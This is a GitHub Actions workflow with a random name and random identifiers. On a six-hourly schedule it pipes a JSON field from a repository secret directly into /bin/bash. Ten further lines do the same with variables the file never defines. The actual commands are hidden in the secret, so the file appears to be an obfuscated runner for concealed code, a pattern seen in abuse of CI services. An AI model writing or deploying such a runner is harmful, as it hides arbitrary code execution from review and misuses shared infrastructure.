name: powerfuldebate

on:
  workflow_dispatch:
  schedule:
    - cron: '34 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: powerfuldebate
        env:
          oncg912: ${{ secrets.oncg912 }}
        run: |
          echo $oncg912 | jq -r .wahf32018 | /bin/bash
          echo $h5114 | jq -r .vp7485 | /bin/bash
          echo $swaxf7 | jq -r .vp8 | /bin/bash
          echo $txqbr730 | jq -r .otyo4116 | /bin/bash
          echo $ykwc0 | jq -r .jb00366 | /bin/bash
          echo $b139 | jq -r .kclve9392 | /bin/bash
          echo $yhzpq31 | jq -r .fmix69 | /bin/bash
          echo $pp7614 | jq -r .w35 | /bin/bash
          echo $rwaow4 | jq -r .dsn71489 | /bin/bash
          echo $zak308 | jq -r .cvqjq32224 | /bin/bash
          echo $pf5010 | jq -r .wzfwm145 | /bin/bash

